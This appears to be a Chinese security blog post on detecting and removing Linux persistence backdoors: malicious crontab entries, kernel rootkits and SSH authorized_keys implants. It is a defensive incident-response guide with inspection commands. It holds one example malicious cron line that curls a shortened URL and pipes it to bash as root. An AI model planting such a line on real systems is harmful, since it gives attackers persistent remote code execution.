新闻详情

新闻详情

首页 / 资讯中心 / 详情

一文看懂 Linux 隐藏后门:计划任务、Rootkit、SSH 后门

发布时间:2026/9/28 18:41:06来源:尧图网络
一文看懂 Linux 隐藏后门:计划任务、Rootkit、SSH 后门
一文看懂 Linux 隐藏后门计划任务、Rootkit、SSH 后门前言在 Linux 服务器入侵事件里攻击者拿到权限后首要目标不是立刻破坏业务而是留下隐藏后门。就算管理员修改密码、杀掉恶意进程只要后门存在攻击者依旧可以再次拿下服务器。很多普通木马容易被ps、top命令发现但隐藏后门往往更隐蔽有的藏在定时任务里开机自启有的在内核层面隐藏进程还有的直接利用 SSH 实现免密登录。很多运维甚至初级安全人员排查时很容易漏掉这一类后门。本文重点拆解 Linux 最常见的三类隐藏后门计划任务后门、Rootkit 内核后门、SSH 免密后门包含原理、特征、排查命令和清除方法适合应急响应、服务器安全巡检。⚠️ 法律声明本文仅用于企业授权环境下安全自查与网络安全学习禁止在未授权的服务器上进行测试、植入后门未经授权的入侵行为属于违法犯罪。一、计划任务后门最常用的持久化隐藏后门计划任务Crontab是攻击者最喜欢的持久化方式简单、稳定、不容易被重视。就算恶意程序被 kill到了定时时间会自动重新下载执行木马。1. 原理Linux crontab 可以按照分钟、小时、天执行指定命令。攻击者写入恶意任务定时拉取远端脚本、启动反弹 shell 或者挖矿程序。分为用户级 crontab和系统级 crontab很多人只查 root 的 crontab忽略系统 cron 目录导致后门遗漏。2. 恶意计划任务典型特征任务执行curl/wget下载外网脚本直接管道交给 bash 执行脚本存放路径在/tmp、/dev/shm这类临时目录命令存在大量 base64 编码字符串解码后执行恶意 shell任务周期很短每几分钟执行一次任务文件名字乱码、隐藏文件.开头放在/etc/cron.d。示例恶意 crontab*/3 * * * * root curl shturl.cc/Bufw7RLUoTUd | bash3. 完整排查命令# 查看当前用户crontab crontab -l # 查看root用户crontab crontab -u root -l # 系统级cron配置文件 cat /etc/crontab ls -l /etc/cron.d/ ls -l /etc/cron.hourly/ ls -l /etc/cron.daily/ ls -l /etc/cron.weekly/ ls -l /etc/cron.monthly/4. 清理方法直接编辑删除crontab -e删掉恶意任务行删除/etc/cron.d下陌生任务文件检查并删除任务中下载的恶意脚本文件检查其他普通用户的 crontab攻击者不一定只用 root 账号。坑点提醒部分攻击者会在 crontab 里写空行、注释混淆视线或者将命令拆分成多行、使用变量绕过简单筛查。二、Rootkit 后门内核级隐藏普通命令看不见进程Rootkit 属于高级隐藏后门也是应急排查中最难处理的一类。普通木马是应用层程序而 Rootkit 一般是内核模块可以劫持系统调用让ps、top、netstat看不到恶意进程、文件、端口。1. 原理Rootkit内核木马加载 ko 内核模块劫持系统函数劫持readdir读取目录时过滤掉恶意文件名劫持getdents过滤恶意进程 PIDps、top 看不到进程劫持网络相关调用netstat 看不到恶意监听端口。简单来说系统命令被 “欺骗”攻击者的程序明明在运行但是常规命令看不到。2. Rootkit 典型特征ps、top看不到可疑进程但服务器 CPU / 内存异常占用/proc目录中存在 ps 无法展示的 PIDlsmod查看内核模块出现不知名、无描述的.ko模块执行uname -a信息被篡改系统版本异常某些恶意文件无法删除删除后自动恢复。3. 排查思路无法单纯依赖 ps、top需要绕过被劫持的系统工具。# 查看加载的内核模块 lsmod # 查看/proc下所有pid对比ps输出找出隐藏PID ls /proc | grep -E [0-9] # 检查模块是否被隐藏查看内核日志 dmesg | grep -i module进阶方案使用静态编译的独立ps、ls二进制文件放到服务器上执行避免系统自带命令被 Rootkit 劫持。4. 清除方法Rootkit 清理难度很高尝试卸载可疑内核模块rmmod xxx.ko很多 Rootkit 会防止卸载直接 rmmod 失败找到 ko 文件删除若内核模块无法卸载最佳方案是备份业务数据后重装系统。重点一旦确认存在内核 Rootkit不建议单纯清理攻击者已经拿到最高内核权限很难保证完全清除后门。三、SSH 后门免密登录无声的永久入口SSH 后门是入侵中高频出现的持久化方式不需要新增系统账号不占用后台进程非常隐蔽。攻击者只需要把自己的公钥写入目标服务器的 authorized_keys之后不用密码就能登录服务器。1. 原理SSH 公钥认证机制将攻击者的公钥写入服务器用户家目录下~/.ssh/authorized_keys攻击者使用对应私钥即可免密登录。不管是 root 账号还是普通用户只要写入公钥就能登录。很多人只检查 root忽略普通业务账号。2. SSH 后门常见变种直接追加公钥到authorized_keys最常见创建.ssh隐藏目录修改目录权限防止管理员查看修改 sshd 配置开启 PermitRootLogin yes放行 root 远程登录替换 sshd 二进制文件制作 sshd 劫持后门高级在多个用户下批量植入公钥防止清理一个账号就失效。3. 排查命令# 遍历所有用户检查.ssh目录 ls -l /home/*/.ssh/ ls -l /root/.ssh/ # 查看authorized_keys内容检查陌生公钥 cat /root/.ssh/authorized_keys cat /home/*/.ssh/authorized_keys检查 sshd 配置cat /etc/ssh/sshd_config重点关注PermitRootLogin、AuthorizedKeysFile等配置项。4. 清理与加固打开authorized_keys删除陌生公钥不要直接清空避免把自己的公钥删掉检查.ssh目录权限目录权限建议 700authorized_keys 权限 600关闭不必要的 root 远程 SSH 登录禁止服务器普通用户随意上传公钥定期巡检所有用户的.ssh 目录。踩坑攻击者会在公钥前面加commandxxx限制登录执行命令这类公钥同样属于后门很容易被忽略。四、三类后门快速对比表表格后门类型隐藏程度排查难度核心风险Crontab 计划任务中等低定时拉起木马重启自动恢复SSH 免密后门高低无进程随时免密登录Rootkit 内核后门极高高劫持系统命令常规排查失效五、一站式巡检命令应急可直接复制执行# 1. 检查crontab crontab -u root -l ls /etc/cron.d # 2. 检查ssh公钥 ls /root/.ssh ls /home/*/.ssh # 3. 检查内核模块 lsmod # 4. 查看最近新增可疑文件 find /tmp /dev/shm /var/tmp -mtime -1 -type f # 5. 查看登录日志 last lastlog六、发现隐藏后门的应急处理步骤保留现场优先不要立刻重启服务器重启可能丢失进程、内存证据隔离主机断开服务器外网防止攻击者继续操作、横向渗透内网定位后门类型区分是计划任务、SSH 公钥还是 Rootkit逐层清理删除恶意文件、清除定时任务、删除陌生 SSH 公钥评估危害检查攻击者是否下载窃取数据、横向访问内网其他机器修复入口查找攻击者是弱密码、漏洞上传还是 webshell 进来复盘加固修改所有账号密码开启日志审计定期巡检。重要提醒如果确认是 Rootkit 内核后门清理风险很大就算删除模块也无法确认攻击者是否留有其他隐藏入口优先评估重装系统。结尾Linux 隐藏后门各有特点Crontab 简单粗暴、SSH 后门悄无声息Rootkit 最难清除。很多入侵事件中攻击者会组合使用多种后门比如植入 SSH 公钥的同时添加 crontab 任务就算其中一个后门被清除另一个还能继续使用。日常服务器安全巡检不能只看进程和 CPU需要多维度交叉验证文件、计划任务、账号、SSH 密钥、内核模块。养成定期巡检的习惯才能在攻击者潜伏阶段就发现隐患。网络安全攻防一直在迭代新的后门技术不断出现。本文覆盖的是生产环境最常见的三类隐藏后门属于应急响应基础技能适合运维转网安、渗透测试入门学习。免责声明本文仅用于网络安全学习、企业授权环境安全自查。任何未经授权访问、植入后门、入侵计算机系统均触犯相关法律法规作者不承担任何非法使用带来的法律责任。了解网络安全首先要搞清楚下面这些前提网络安全到底包含哪些技术是否需要会编程网络安全行业有哪些职业方向“我”该如何选择网络安全的职业发展和成长路线是什么如果你是准备学习网络安全黑客或者正在学习下面这些你应该能用得上①网络安全学习路线②20份渗透测试电子书③安全攻防357页笔记④50份安全攻防面试指南⑤安全红队渗透工具包⑥网络安全必备书籍⑦100个漏洞实战案例⑧安全大厂内部视频资源⑨历年CTF夺旗赛题解析一、网络安全黑客学习路线网络安全黑客学习路线形成网络安全领域所有的知识点汇总它的用处就在于你可以按照上面的知识点去找对应的学习资源保证自己学得较为全面。二、网络安全教程视频我们在看视频学习的时候不能光动眼动脑不动手比较科学的学习方法是在理解之后运用它们这时候练手项目就很适合了。三、网络安全CTF实战案例光学理论是没用的要学会跟着一起敲要动手实操才能将自己的所学运用到实际当中去这里带来的是CTFSRC资料HW资料毕竟实战是检验真理的唯一标准嘛~四、网络安全面试题最后我们所有的作为都是为就业服务的所以关键的临门一脚就是咱们的面试题内容所以面试题板块是咱们不可或缺的部分这里我给大家准备的就是我在面试期间准备的资料。网安其实不难难的是坚持和相信自己我的经验是既然已经选定网安你就要相信它相信它能成为你日后进阶的高效渠道这样自己才会更有信念去学习才能在碰到困难的时候坚持下去。机会属于有准备的人这是一个实力的时代。人和人之间的差距不在于智商而在于如何利用业余时间只要你想学习什么时候开始都不晚不要担心这担心那你只需努力剩下的交给时间这份完整版的网络安全学习资料已经上传CSDN朋友们如果需要可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费】
网站建设高端定制企业官网
RELATED

相关资讯

更多精彩内容,欢迎继续阅读

较早相关资讯

最新相关资讯

如何读懂GitHub Trending日榜:从Star到代码跑通的开源项目筛选指南 2026/9/28 19:46:05

如何读懂GitHub Trending日榜:从Star到代码跑通的开源项目筛选指南

晚上十点半,我关掉 IDE 里的最后一个终端,习惯性地点开 GitHub Trending,切到 Today 这一档日榜。这个动作我保持了很多年,从最早的好奇心变成现在的工作流一部分。很多人觉得日榜不过是几个仓库名字加一串 Star 数字,…

阅读更多 →
深入解析 MCP:AI 时代的通用上下文与工具协议,TaoToken 统一 Key 接入实战 2026/9/28 19:45:59

深入解析 MCP:AI 时代的通用上下文与工具协议,TaoToken 统一 Key 接入实战

/* MD / 富文本中的 .toc(含博客园搬家等嵌套结构);.toc-box 在侧栏,不受影响 */#content_views .toc,/* 编辑器常在目录前后插入空 p(:empty 仍占 20px),一并去掉避免顶空隙 */#content_views.markdown_views > p:empty:has(+ .toc),#content_views.markdown_views …

阅读更多 →
ClawX (OpenClaw) 安装配置完全指南:用 TaoToken 统一 Key 让 Mac 上的 AI 助手一次跑通 2026/9/28 19:45:59

ClawX (OpenClaw) 安装配置完全指南:用 TaoToken 统一 Key 让 Mac 上的 AI 助手一次跑通

/* MD / 富文本中的 .toc(含博客园搬家等嵌套结构);.toc-box 在侧栏,不受影响 */#content_views .toc,/* 编辑器常在目录前后插入空 p(:empty 仍占 20px),一并去掉避免顶空隙 */#content_views.markdown_views > p:empty:has(+ .toc),#content_views.markdown_views …

阅读更多 →
CH55xDuino编译报错sdcc.sh语法错误修复指南 2026/9/28 19:45:59

CH55xDuino编译报错sdcc.sh语法错误修复指南

如果你最近在 Windows 下用 Arduino IDE 折腾 CH55xDuino,编译一个最简单的 Blink 却碰到sdcc.sh: syntax error: unexpected "("这个报错,先别慌——芯片没有坏,代码也没有错,问题出在工具链的调用方式上。我花了一个晚…

阅读更多 →
Mac 安装 Codex 跳过验证码验证:TaoToken 统一 Key 接入与 config.toml 配置骨架 2026/9/28 19:45:58

Mac 安装 Codex 跳过验证码验证:TaoToken 统一 Key 接入与 config.toml 配置骨架

/* MD / 富文本中的 .toc(含博客园搬家等嵌套结构);.toc-box 在侧栏,不受影响 */#content_views .toc,/* 编辑器常在目录前后插入空 p(:empty 仍占 20px),一并去掉避免顶空隙 */#content_views.markdown_views > p:empty:has(+ .toc),#content_views.markdown_views …

阅读更多 →
ABB ACS510/550变频器面板中文设置与参数备份保姆级教程 2026/9/28 19:45:58

ABB ACS510/550变频器面板中文设置与参数备份保姆级教程

1. 上手之前,先弄明白ACS510/550面板到底能干什么ABB ACS510和ACS550这两款变频器,在风机水泵、传送带、搅拌机这些场景里几乎是“标配级”的存在。尤其是ACS550,当年很多水处理项目、楼宇自控项目里一用就是十几年,到现在还在稳定…

阅读更多 →

今日资讯

本周资讯

本月资讯

看完文章仍有疑问?

联系尧图顾问,获取一对一建站咨询

立即免费咨询 📞 400-888-8888
📞 ✉